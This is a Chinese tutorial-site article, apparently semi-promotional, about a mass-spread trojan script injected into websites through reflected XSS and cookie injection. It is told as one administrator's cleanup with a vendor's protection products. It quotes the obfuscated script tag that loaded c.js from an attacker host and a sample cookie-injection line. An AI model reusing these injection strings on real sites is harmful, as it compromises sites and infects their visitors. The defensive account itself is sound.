IE漏洞攻击剧增,最新/CSS/c.js木马防范手记

2016-02-19 19:48 12 1 收藏

今天图老师小编给大家介绍下IE漏洞攻击剧增,最新/CSS/c.js木马防范手记,平时喜欢IE漏洞攻击剧增,最新/CSS/c.js木马防范手记的朋友赶紧收藏起来吧!记得点赞哦~

【 tulaoshi.com - Web开发 】

  近日,一款利用IE7漏洞进行传播的脚本木马在网上迅速传播,该木马利用搜索引擎检索站点漏洞,并进行自动传播。几天内,数万站点遭受感染,其中hongxiu.com、msn中国、东方财经网等都被入侵。

  发现恶意软件!

(本文来源于图老师网站,更多请访问http://www.tulaoshi.com/webkaifa/)

  某日早上,某网站维护人员小任像往常一样打开了网站首页,随手点击了一个链接,想验证一下网站是否可以正常访问,没想到居然触发了防病毒的软件的报警:“发现恶意软件”。心细的小任在一查之下大吃了一惊:首页的几乎所有链接都被加上了一个奇怪的网址“http://c.nuclear3.com/css/c.js”,而这个js脚本,就是触发防病毒软件报警的元凶。

  无奈之下,小任想到了自己单位的网络安全设备提供商启明星辰公司,并立刻联系上该公司驻当地人员,同时一并提供的还有网站的日志文件。

  攻击者的手法

  很快,小任就得到了启明星辰工程师的反馈信息,在网站的/down.asp页面下,存在一个反射式的XSS漏洞,骇客就是利用这个漏洞,通过cookie 注入的方式,将恶意脚本“Script Src=http://c.nu%63%6Cear3.com/css/c.js/script ”注入到每一个网站链接中,以达到危害用户的目的。

  小知识:什么叫反射式XSS?

  Web客户端使用Server端脚本生成页面为用户提供数据时,如果未经验证的用户数据被包含在页面中而未经HTML实体编码,客户端代码便能够注入到动态页面中。

  在这个例子里,骇客将恶意脚本嵌入URL,网站访问者一旦点击这个链接,浏览器将认为恶意代码是来自网站,从而“放心”的执行。

  小知识:cookie注入

  Cookie注入是SQL注入攻击的一种表现形式,是系统直接使用"request("name")"获取客户提交的数据,并对客户提交的变量没有过滤,而且在防注入程序中没有限制Request.cookie所导致的。

  一个典型的例子就是javascript:alert(document.cookie="id="+escape(XX and "attack string")。

(本文来源于图老师网站,更多请访问http://www.tulaoshi.com/webkaifa/)

  斩断注入黑手

  了解了问题的根源,剩下的就是防御问题了。在启明星辰工程师的协助下,通过安星远程网站安全检查服务,小任挨个清除了页面上所挂木马,同时还发现网站存在数个SQL注入和XSS漏洞,而原有的网站安全检查代码由于无法进行语义一级的还原①,无法彻底杜绝这两类攻击,只有通过部署相应安全产品解决。在对比了数家国内外的Web安全防御产品后,该网站最终选择了天清入侵防御产品,其采用攻击机理分析方式对Web威胁如SQL注入、XSS攻击等进行精确阻断。与传统的基于数据特征匹配和基于异常模型构建的Web安全相比,有着更低的漏报率和误报率。天清入侵防御产品上线后,当小任尝试用此前注入漏洞再次进行攻击时,发现在产品事件监视台上已经及时出现了报警信息并予以了阻断。再次采用安星检查服务后发现,已经无法嗅探出任何漏洞。

来源:http://www.tulaoshi.com/n/20160219/1621849.html

延伸阅读
标签: 电脑入门
   1.登录QQ前可打开“查找文件或文件夹”对话框,在“本地硬盘驱动器”范围内输入“qq”进行查找,那些没有改名的盗号软件一般能在查找结果中现出原形,如果有,马上将它删除。 2.用注册向导登录时,可以在号码前加上一长串“0”。这并不影响正常登录,却能迷惑那些木马,因为这类工具多半只能记录9位以下的数字。而面对超出其记录...
标签: 电脑入门
   1.登录QQ前可打开“查找文件或文件夹”对话框,在“本地硬盘驱动器”范围内输入“qq”进行查找,那些没有改名的盗号软件一般能在查找结果中现出原形,如果有,马上将它删除。 2.用注册向导登录时,可以在号码前加上一长串“0”。这并不影响正常登录,却能迷惑那些木马,因为这类工具多半只能记录9位以下的数字。而面对超出其记录...
标签: 电脑入门
由于QQ在桌面IM领域占据着绝对霸主地位,在其身上衍生的各种产品也变得日益流行,而Qzone也逐渐成为网友书写日志和展示个性的地方。因此,Qzone的安全性也备受关注。不过,Qzone近日却爆出了一个跨站漏洞,这个漏洞非常容易被黑客利用。那么,黑客一般会如何通过这个漏洞来攻击普通用户呢?作为用户,我们又如何来防范这一漏洞的危害呢? ...
标签: Web开发
现在基于web的攻击一般都是注入。导致注入的原因一般为对变量的过滤不完全,从而可以使入侵者非法执行程序或查询修改任意数据。随着注入攻击的愈演愈烈,一些专门的过滤代码应运而生。但一些过滤代码的不完善很可能导致新的攻击。下面就以目前应用最广泛的过滤代码--SQL通用防注入程序为下列说明漏洞的成因、利用方法及防范措施。 SQL...
标签: Web开发
ASP木马猖獗,基于ASP的网站时时处于危险之中,要让网站的安全随时得到保障,需要我们的服务器管理员要做些什么呢,如何防范ASP木马呢?要防范ASP木马,那么我们就需要知道它的运行原理和机制,下面我们看一段代码: Set oscript = Server.CreateObject("Wscript.SHELL") "建立了一个名为oscript的Wscript.SHELL对象,用...

经验教程

735

收藏

53

精华推荐

警惕CSS挂马攻击

警惕CSS挂马攻击

猫二哥丨

防范QQ木马的四则新技巧

防范QQ木马的四则新技巧

鸢尾花的许诺

Dreamweaver中sql注入式攻击的防范

Dreamweaver中sql注入式攻击的防范

风筝82212

微博分享 QQ分享 QQ空间 手机页面 收藏网站 回到头部